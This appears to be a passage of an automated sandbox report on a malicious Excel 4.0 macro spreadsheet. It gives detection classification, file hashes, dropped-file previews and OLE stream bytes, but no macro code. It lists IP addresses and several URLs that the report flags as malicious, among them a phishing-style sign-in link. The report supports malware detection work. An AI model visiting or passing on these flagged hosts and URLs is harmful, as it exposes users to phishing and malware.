                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.evad.winXLS@3/7@1/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 93.184.220.29, 52.255.188.83, 131.253.33.200, 13.107.22.200, 20.82.210.154, 104.43.139.144, 92.122.145.220, 52.109.32.63, 52.109.12.23, 52.109.8.24, 52.109.12.24, 13.88.21.125, 184.30.24.56, 92.122.213.194, 92.122.213.247, 8.253.207.120, 67.27.158.126, 8.248.113.254, 67.26.73.254, 8.248.135.254, 20.54.26.129
                                                                                                                                                  • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  170.249.236.47e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    PRIVATESYSTEMSUSe1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    copy of payment 7006.vbsGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.206.186
                                                                                                                                                    369290.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 204.197.253.150
                                                                                                                                                    Payment_png.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.199.106
                                                                                                                                                    R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                                                                                                                    • 108.160.158.123
                                                                                                                                                    P.O 5282.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.209.250
                                                                                                                                                    documentation (64).xlsGet hashmaliciousBrowse
                                                                                                                                                    • 67.222.24.174
                                                                                                                                                    documentation (64).xlsGet hashmaliciousBrowse
                                                                                                                                                    • 67.222.24.174
                                                                                                                                                    Statement for T10495.jarGet hashmaliciousBrowse
                                                                                                                                                    • 207.7.94.54
                                                                                                                                                    Statement for T10495 - 18-01-21 15-23.jarGet hashmaliciousBrowse
                                                                                                                                                    • 207.7.94.54
                                                                                                                                                    Revise Order.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.248.50.97
                                                                                                                                                    PO21010699XYJ.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.248.50.97
                                                                                                                                                    cmtel-pdf.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 204.197.244.149
                                                                                                                                                    cmtel-pdf.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 204.197.244.149
                                                                                                                                                    SecuriteInfo.com.Trojan.PWS.Stealer.29660.11031.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.211.86.20
                                                                                                                                                    https://oldfordcrewcabs.com/bin/new/s/?signin=d41d8cd98f00b204e9800998ecf8427e&auth=576667a3e7108b979c62abddd4c8f3e39d282c0ee888bd787542afb4ff83df171524e184Get hashmaliciousBrowse
                                                                                                                                                    • 199.167.203.145
                                                                                                                                                    SecuriteInfo.com.Trojan.PackedNET.405.30542.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.211.86.20
                                                                                                                                                    4ADvH4Xsmh.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.246.57.153
                                                                                                                                                    https://www.casalfarneto.it/wp-content/siteguarding_logs/www.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 104.193.111.209
                                                                                                                                                    RFQ-1225 BE285-20-B-1-SMcS - Easi-Clip Project.exeGet hashmaliciousBrowse
                                                                                                                                                    • 158.106.136.41

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19MV RED SEA.docxGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    IMG-WA7905432.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Tree Top.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    PT6-1152.docGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    s.dllGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    setup-lightshot.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    s.dllGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    pic05678063.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    e17486cd_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    Purchase Order comfirmation to issue INVOICE.htmlGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47
                                                                                                                                                    jX16Cu330u.exeGet hashmaliciousBrowse
                                                                                                                                                    • 170.249.236.47

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\CDE88565-44BA-40AC-8A9E-1CA847469122
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134558
                                                                                                                                                    Entropy (8bit):5.368414756282515
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:YcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:fEQ9DQW+zPXO8
                                                                                                                                                    MD5:18E3B12893EEFEB2BE8E7BC323707DB2
                                                                                                                                                    SHA1:64C9969F961457DDF0D5179D26EAE99178EA5FA1
                                                                                                                                                    SHA-256:4401594B1B7495C244ABEED48A97A519262FBBE428F05333AFF0636AC2F6CB07
                                                                                                                                                    SHA-512:3339CFF863EB5A5AA7901D1D4A8C97A5953A3F8B7730A0EEEA784011B9934CFE45C983F02366329E9E1E3AB01620C2BA1408AC37F51518AC529768637F4C8D87
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T08:57:38">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\E5C10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85151
                                                                                                                                                    Entropy (8bit):7.889280659792948
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:J3TzJxfg8ucuv4KrAeWviSkQ1WGHKlMVGoIahaDHTU6hryF70Ug:J3zgvcCbrAiSkQ1W2K2sTU2yF70Ug
                                                                                                                                                    MD5:C28C8BAC09C1AF3BE456ADA55E86C3F6
                                                                                                                                                    SHA1:6106316CB8338FF2AF6B25506DD221CF334AFC56
                                                                                                                                                    SHA-256:46018BCF9530F318F427C8538A84B0F0AF053704C56F0384C26A5D70DC62BC80
                                                                                                                                                    SHA-512:29F1C3D956055243ECFFF8A36F64CBE08F7E4807EDD013794819C3B81344EBF4806DBAE8AF2036188A75F30A4441688385A8B8AD5D7A614A3C7573F19DA715E6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.n.0....?.........r.Izl.4...\Y....$..wI+j..e..r..........x...559.f....fY.._..R..`......9_|.2.Y;...M.I...Ii.-h.*...Ic.f._..:.Wl..t6;...&.1q.....v.bq...M$.,Iq../I.D.O..(.t3...t2...+.sNI.".>...K........t...}G!....\.....x)..f>.f...N.G.Ww...$)J.J.8.*....{{e..<c.<E.E)#....$_...M#9...5.......L.*9..{.q.Iq........v......2.....E.h...h..C.h....f..!...#..tJ.e....q\.=....q...S...8<.=..g._.8....w.>.ko].u.a...6IB....G......"..CZ...6..}........PK..........!...i.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Tue May 4 16:57:43 2021, atime=Tue May 4 16:57:43 2021, length=8192, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):909
                                                                                                                                                    Entropy (8bit):4.70367217896161
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8JGJRUt6CHiXOzDGXthDV+W+jA0/y1bDygLkeGLkeM4t2Y+xIBjKZm:8JcsurmA0KJDyS7aB6m
                                                                                                                                                    MD5:F5B4B42CFC3C63093DE56816959E9BB3
                                                                                                                                                    SHA1:D19646FA6C9C0279206FB9A00A4DDA6CF12A46B3
                                                                                                                                                    SHA-256:B8D74FCFCFA72ABC2E5228F860B2BCB44601C210064109F92330487FC65C4C12
                                                                                                                                                    SHA-512:482CCFBA108BEA255DB1B7B500AC580BD593727D8F01DE7E6AF84214207F95C342FAF592EED3990EB777BA1FB3FE3F194BA635C771564178F6B75001BAB502FC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F............-...;...A......A... ......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R*.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R*......S.....................q..a.l.f.o.n.s.....~.1......R6...Desktop.h.......NM..R6......Y..............>.......;.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......910646...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e1df57de_by_Libranalysis.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:08 2020, mtime=Tue May 4 16:57:43 2021, atime=Tue May 4 16:57:43 2021, length=114688, window=hide
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):2260
                                                                                                                                                    Entropy (8bit):4.736998091463738
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:8tu7RuhOEXTKcNfOEAE2B6ptu7RuhOEXTKcNfOEAE2B6:8JFecNfFCKJFecNfFC
                                                                                                                                                    MD5:A4F1C92E2E88844149D9DDE7A878BF6A
                                                                                                                                                    SHA1:CB050263FC8E686DEF99FB7A7D32B5C00EFAC621
                                                                                                                                                    SHA-256:3B8EBE09578519F5CA0351A875916901D5350198029B791632139E9D5C6CC250
                                                                                                                                                    SHA-512:ACFE7C52EEB81C95A6771C3F366BA711F8D439F207F058CEB89F1D9EF1869185BDDFA2A556EF6F62716A3BE20574CD1829FC26E75449D6D618AA1D8696314947
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... .....>.8.......A......A...............................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...R*.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..R*......S.....................q..a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..R+......Y..............>.....u&..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..b...R1. .E1DF57~1.XLS..j......>Q.u.R1.....f......................6'.e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......c...............-.......b...........>.S......C:\Users\user\Desktop\e1df57de_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Aw...`.......X.......910646...........!a..%.H.VZAj....Zt.+........W...!a..%.H.VZAj....Zt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):125
                                                                                                                                                    Entropy (8bit):4.7413886091115245
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomM6YiHUwSLMp6lYUIYiHUwSLMp6lmM6YiHUwSLMp6lv:dj6hi0NRi0Nbhi0Nf
                                                                                                                                                    MD5:FA818B7E82A804136CCCDAEB0E371E4C
                                                                                                                                                    SHA1:790C7E1C67EC725C24D5056180873455ACC57A4E
                                                                                                                                                    SHA-256:6CAF0A49734FC7FE1DE034E925D1906442024E0C40C0BBA612217B0245B51B58
                                                                                                                                                    SHA-512:7D1ACC9D7F01044F50BD4926CB5DBB27A83459CB0EFE966A73F8C1803A7AB3FD2EA347C9ABAE584DAFE1EC152E918722C2F1BD4ACD4FFC2A296EDCEE6790DE00
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..e1df57de_by_Libranalysis.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\F6C10000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):168450
                                                                                                                                                    Entropy (8bit):6.809325376522765
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:fC8rmOAIyyzElBIL6lECbgBGzP5xLm7TE2nTUSyF70HijW26kHct6kHC4+C8rmOs:q8rmOAIyyzElBIL6lECbgB+P5Nm7TrU0
                                                                                                                                                    MD5:6C145938CE01E31F5B5D40E708709164
                                                                                                                                                    SHA1:A244BCDF67106C5B7CCE73F98B51C0DBBCAEEA15
                                                                                                                                                    SHA-256:F8E76ED1D5AEE18CB8F579FA006F10426D031005B357FDDC07C3C6212D83FE3D
                                                                                                                                                    SHA-512:6601722CC3B0D06BCC54694A624408123A5351AA8082877297A561385190F8084B9B2BF630F0CCC5DE47BC5C6257732B4B9DFCF394E990A4086F3D2334F074DF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: ........T8..........................\.p....pratesh B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 28 08:31:09 2021, Security: 0
                                                                                                                                                    Entropy (8bit):3.26064272206503
                                                                                                                                                    TrID:
                                                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                    File name:e1df57de_by_Libranalysis.xls
                                                                                                                                                    File size:287232
                                                                                                                                                    MD5:e1df57deebdfeab450bf91049acff902
                                                                                                                                                    SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
                                                                                                                                                    SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
                                                                                                                                                    SHA512:3a2878bee800832e2eac6705d4b299b0814af28bf47dc0504a1425b87f9728f94a208222d3da907a35ce6c0cce0bce279cb765060e1fa464656bc83d4cfd9c87
                                                                                                                                                    SSDEEP:6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5ICJK+T5gE:lDE
                                                                                                                                                    File Content Preview:........................>......................./...........................*...+...,...-......................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "e1df57de_by_Libranalysis.xls"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:True
                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                    Summary

                                                                                                                                                    Code Page:1251
                                                                                                                                                    Last Saved By:5
                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                    Last Saved Time:2021-04-28 07:31:09
                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                    Security:0

                                                                                                                                                    Document Summary

                                                                                                                                                    Document Code Page:1251
                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                    Contains Dirty Links:False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.344544096356
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.239529171145
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . t . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                                                                                                                                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 275392
                                                                                                                                                    General
                                                                                                                                                    Stream Path:Book
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                    Stream Size:275392
                                                                                                                                                    Entropy:3.23578403018
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
                                                                                                                                                    Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                    Macro 4.0 Code

